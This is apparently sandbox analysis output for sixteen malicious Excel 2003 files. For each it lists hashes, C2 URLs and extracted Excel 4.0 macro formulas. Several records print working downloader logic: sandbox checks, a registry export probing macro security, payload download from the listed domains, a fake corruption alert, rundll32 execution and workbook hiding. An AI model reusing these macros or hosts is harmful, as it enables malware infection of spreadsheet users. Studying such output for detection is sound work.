{"version":"0.2","sample":{"sample":"","kind":"file","target":"0d63faefd42044541b258c34d9af7f73b6fefe6fd1ea8f4df6a35bc047a95c76"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0d63faefd42044541b258c34d9af7f73b6fefe6fd1ea8f4df6a35bc047a95c76","filesize":170496,"md5":"68e6d962a8e73369e182b9fdfc2241b7","sha1":"07d53680fe7dd46215c2516a19a3689b8a8feff9","sha256":"0d63faefd42044541b258c34d9af7f73b6fefe6fd1ea8f4df6a35bc047a95c76","sha512":"c4e6f451f93ea7b932de3f9c84f44b48238d697fb291598f8f9832ea4312aa2a504241496bd08ef130d0fc957266fad2932783dfc2ce36f5f81e7927e5ce2c26","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0d63faefd42044541b258c34d9af7f73b6fefe6fd1ea8f4df6a35bc047a95c76.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JmfzVT15Vh\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0d7d5af6ab2a3dc046f7efd4d4309079dc4b10329de7667634cbfe434e4da079"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0d7d5af6ab2a3dc046f7efd4d4309079dc4b10329de7667634cbfe434e4da079","filesize":226304,"md5":"b4ccf9a146ab053cfa0c390e5d9bcabd","sha1":"07e3f67f6c144dd73c79e47907413bee1d2f3f74","sha256":"0d7d5af6ab2a3dc046f7efd4d4309079dc4b10329de7667634cbfe434e4da079","sha512":"05a29b65d2d40477215e57cee6c118dd45e5d26eafde63a9c109a74ea5c70b04a8bc6edef449177ccd13c3ed7db83ab0b372a5bc17f07ed00b5c7b6496c825d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0d7d5af6ab2a3dc046f7efd4d4309079dc4b10329de7667634cbfe434e4da079.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Aqxambq3kt\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0d9d694457c9ac2aa35013de31cfbadc30ec457f634cff30f8d3eade65fae56c"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0d9d694457c9ac2aa35013de31cfbadc30ec457f634cff30f8d3eade65fae56c","filesize":112128,"md5":"09e68fc611b57f71444ec596eebb58a0","sha1":"4b5ae03e650eb0b5403aad1ded91270a23e448e7","sha256":"0d9d694457c9ac2aa35013de31cfbadc30ec457f634cff30f8d3eade65fae56c","sha512":"de9017c91a37421c08fd6e2ec49d91e6a7baf14bd46e03d7311d85b06eff5ded301bbca7c4817ee598625f5cac3d8daacd5cf7f77ee79e630eeee5c1346e4b9d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0d9d694457c9ac2aa35013de31cfbadc30ec457f634cff30f8d3eade65fae56c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0db722a212716a5101a5554867519bcae3810b4022f21b79d7e02f534537345d"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0db722a212716a5101a5554867519bcae3810b4022f21b79d7e02f534537345d","filesize":132608,"md5":"c671e37edc19b5397eb133909f844f16","sha1":"83ed14b8ed771e4206e5556c2c4aa4c3e7b105c9","sha256":"0db722a212716a5101a5554867519bcae3810b4022f21b79d7e02f534537345d","sha512":"57102f72c81486729b0a2f9bbda2461f18a8d09a5f082e4731acd6c4fd276e1380fcce2ca820119c571904f735421cf1aeae38d442af253b125dff1d27eae83a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0db722a212716a5101a5554867519bcae3810b4022f21b79d7e02f534537345d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"o4ztEcfgfn\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0dcf5701d310cb62c0019a443d9ec51d1e780ecd6ac42f0aca9866634bc7c03e"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0dcf5701d310cb62c0019a443d9ec51d1e780ecd6ac42f0aca9866634bc7c03e","filesize":142848,"md5":"0b03b60c1cae6d852e25043933ff5f67","sha1":"ff6747e0d9e7cba7530a451badee10d77aa7c1b8","sha256":"0dcf5701d310cb62c0019a443d9ec51d1e780ecd6ac42f0aca9866634bc7c03e","sha512":"e7d6725e702209150a26b37081699edc24203afd0a102ab8ca138f01eb938b00c30fba7c9352fb4deff562eb8bac094717fbde6fee1a5b52e9df683c99b93dfc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0dcf5701d310cb62c0019a443d9ec51d1e780ecd6ac42f0aca9866634bc7c03e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"dzJOzPc9Iz\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ddb75f2a79fd93aab75280e6f57dd76026a4ec90a99ffb52dc5db7c64e1eaff"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0ddb75f2a79fd93aab75280e6f57dd76026a4ec90a99ffb52dc5db7c64e1eaff","filesize":206336,"md5":"d6e04395719a4f763887fee8164b8c6f","sha1":"c6e3e493073c97c2cbacd20b7bab82b01cf269e8","sha256":"0ddb75f2a79fd93aab75280e6f57dd76026a4ec90a99ffb52dc5db7c64e1eaff","sha512":"addc789db1a9144c0796d53ef29df7eb31051c8f02b168277a6fed19403a9722a495dafa85169237ce05ff2f5afb182a884ed80338bec1772921508e88c119b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ddb75f2a79fd93aab75280e6f57dd76026a4ec90a99ffb52dc5db7c64e1eaff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OEQG3XUzfa\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0df97b5244f85e80f13f5485f60c56ee8198d56375d531c3081cd60eb8d3c2fa"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0df97b5244f85e80f13f5485f60c56ee8198d56375d531c3081cd60eb8d3c2fa","filesize":112640,"md5":"d428867c64d7b81035aeb971fe0b3284","sha1":"b804bcc067f31029a1a1fa6a61b7bfcb356757e0","sha256":"0df97b5244f85e80f13f5485f60c56ee8198d56375d531c3081cd60eb8d3c2fa","sha512":"586077765d636ad2c681f2a170f4cddb1764235d460bba9b500cf815a9532252df8c77d20c361b046061702e8c04ad47cf80cad78ec8ed4e194638b1df279f4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0df97b5244f85e80f13f5485f60c56ee8198d56375d531c3081cd60eb8d3c2fa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0dfd0bb8948cf3ccc276432206824e2d85f5f836dfdf57795729bf1cdd2c7fae"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0dfd0bb8948cf3ccc276432206824e2d85f5f836dfdf57795729bf1cdd2c7fae","filesize":146944,"md5":"65f97f4e788aba99580e9aa3efde26f1","sha1":"5506b13700f7fda1836748ad9366c9156a8c0023","sha256":"0dfd0bb8948cf3ccc276432206824e2d85f5f836dfdf57795729bf1cdd2c7fae","sha512":"1ac2a432d243a7bcc223701605e893c6b0110f2d976e680d63752cac1434b93ea961c1dbb91eb8493b67420b3714e876a619181a8065d72d3bee96dc38831a18","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0dfd0bb8948cf3ccc276432206824e2d85f5f836dfdf57795729bf1cdd2c7fae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"nc01ujFubL\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e0a2fd305f5f9c155c0507797ab8d1fada467fedced970fb4e9dc59bb518b73"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e0a2fd305f5f9c155c0507797ab8d1fada467fedced970fb4e9dc59bb518b73","filesize":185344,"md5":"9c4192f003c75dc1f9d8bf4877d8995b","sha1":"87eb6318e3b6e0395f71988a34e70dc8627b61b1","sha256":"0e0a2fd305f5f9c155c0507797ab8d1fada467fedced970fb4e9dc59bb518b73","sha512":"47fe6a8b08a1b28dcfd5e1fdb68845cc9fc7fffbc73085dca2647501d2d486b8b87b63c383ac50312852ece805a7683776c56d5bffbd92882214018d8e920eb4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e0a2fd305f5f9c155c0507797ab8d1fada467fedced970fb4e9dc59bb518b73.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e224ef05a3f34174d7401b805344001c101a05ebabb0314b56a5a27a02b4a27"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e224ef05a3f34174d7401b805344001c101a05ebabb0314b56a5a27a02b4a27","filesize":209920,"md5":"f1f8103b0efed7b0fff51618f43f563d","sha1":"23b5e9e022dc62fa0f01207f380f8c1fe2422230","sha256":"0e224ef05a3f34174d7401b805344001c101a05ebabb0314b56a5a27a02b4a27","sha512":"ee6d487d2063bf3e156802c544c1a87dc27de16d445de5c15d70df3e8885ab4696f2c720515d20b2af8da8301973b1b0e02dc975a4b3b838e38aaaf8c09eab9a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e224ef05a3f34174d7401b805344001c101a05ebabb0314b56a5a27a02b4a27.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"85j1XXWaRF\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e2eef54add444ad4a1d0ccca212cfe29b30fabc5106df0ba37b0954d91e8b03"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e2eef54add444ad4a1d0ccca212cfe29b30fabc5106df0ba37b0954d91e8b03","filesize":112128,"md5":"dcd4e993c6654a98c9807d4e5f21ff74","sha1":"65f853928b5eb8d92d52d7248082cac30b124346","sha256":"0e2eef54add444ad4a1d0ccca212cfe29b30fabc5106df0ba37b0954d91e8b03","sha512":"32f080647a2a4458ac11432b29540a4b1f819287241f0c16b5714cffd55fa24e609f27f67ccd6bd8f39dc54810b31651804b81056197249df2dc66b9f74a3392","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e2eef54add444ad4a1d0ccca212cfe29b30fabc5106df0ba37b0954d91e8b03.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e2ff702867154d0dd4e11363dafedf037676a02e9be433e2c89ce996146cfa2"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e2ff702867154d0dd4e11363dafedf037676a02e9be433e2c89ce996146cfa2","filesize":185344,"md5":"526afd01523366f164a998dd1b442368","sha1":"903820082604be0ea4c42742d29f80a265857368","sha256":"0e2ff702867154d0dd4e11363dafedf037676a02e9be433e2c89ce996146cfa2","sha512":"99c016f70b7ba68e71a7c48f5ab79da25df6a0ea0cfa29020c1316fb6a65b4bc016e5728feae0d2e73b4cc6efa8a366969e777804ed1ed6b3b81eea1b110bcff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e2ff702867154d0dd4e11363dafedf037676a02e9be433e2c89ce996146cfa2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e305a383fdb21e48ed99f94395d086188054918a33f4153cb3cd0b51d5b5146"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e305a383fdb21e48ed99f94395d086188054918a33f4153cb3cd0b51d5b5146","filesize":116224,"md5":"d6d23fbe7e0285021525f82f1c16ce44","sha1":"fdcb5fbd51269c492cbbb805747e8f968adc0e83","sha256":"0e305a383fdb21e48ed99f94395d086188054918a33f4153cb3cd0b51d5b5146","sha512":"0bd55ce3a2222c89231354cf43c96395c1f4e3f5204e36add1926d43771d9165b65f6f68436b6aec1f7236b6a910d7d7b35f1e42db3e82f6c482a0222f4294c9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e305a383fdb21e48ed99f94395d086188054918a33f4153cb3cd0b51d5b5146.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hBPjnrRcl9\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e3ab3c3c57ce242818318d69205a106e02fea7cfab19860c1468ae6c99655d8"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e3ab3c3c57ce242818318d69205a106e02fea7cfab19860c1468ae6c99655d8","filesize":185344,"md5":"a6d0b7208101f88caf99bdd06877ccd8","sha1":"3fda378051b4ec11a76036d0f16bf1a0f20c3dbf","sha256":"0e3ab3c3c57ce242818318d69205a106e02fea7cfab19860c1468ae6c99655d8","sha512":"0413ffd781047611ee1b0b361f86be810c60d28e5db8c7ef76ad61d786dea73640d77dac7c611aed1a26649ff021841899b7d5c2a6fb3bed274606f44f8023b6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e3ab3c3c57ce242818318d69205a106e02fea7cfab19860c1468ae6c99655d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e41c90822eefab9a1d4c4ec94826fd312658d44e497092bb077a7908dc40a79"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e41c90822eefab9a1d4c4ec94826fd312658d44e497092bb077a7908dc40a79","filesize":104448,"md5":"1349b99b21185ed42a365d606c83f14a","sha1":"b161bcaa28a234f98cdcb342759b3b0d00efd7b9","sha256":"0e41c90822eefab9a1d4c4ec94826fd312658d44e497092bb077a7908dc40a79","sha512":"b7bd36e0eacc39e9a28f3b944b3b6df3fa5cc588a2828ff1d047c8fa41f35c8666b4c6e20ea1e8eb3d692d7d50417c39c412e1612bee7c7f6c1bc17bfbad95b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e41c90822eefab9a1d4c4ec94826fd312658d44e497092bb077a7908dc40a79.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"BRGbRkTpWI\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e4a9328a109d33c9a8fc47f5c6165d49a0c4a654d2fd95491419571eefb633b"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e4a9328a109d33c9a8fc47f5c6165d49a0c4a654d2fd95491419571eefb633b","filesize":113664,"md5":"d15e6c339c2aa098b5b2ae11c33c2be7","sha1":"95fda1f15cfa98f8af10e2ccc7c6f4f434d6a94c","sha256":"0e4a9328a109d33c9a8fc47f5c6165d49a0c4a654d2fd95491419571eefb633b","sha512":"04d8e39a849abfe9844ff3f94764d2f864ae81d4ff9461a8c0335b427e20f2cef93bae793c82227bc6fd7dbb6d5dd304aa56801de78431a6a0179d1a1142c907","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e4a9328a109d33c9a8fc47f5c6165d49a0c4a654d2fd95491419571eefb633b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"p6VVE7shdE\",TRUE)\nGOTO(R$1C$10)"}}}]}
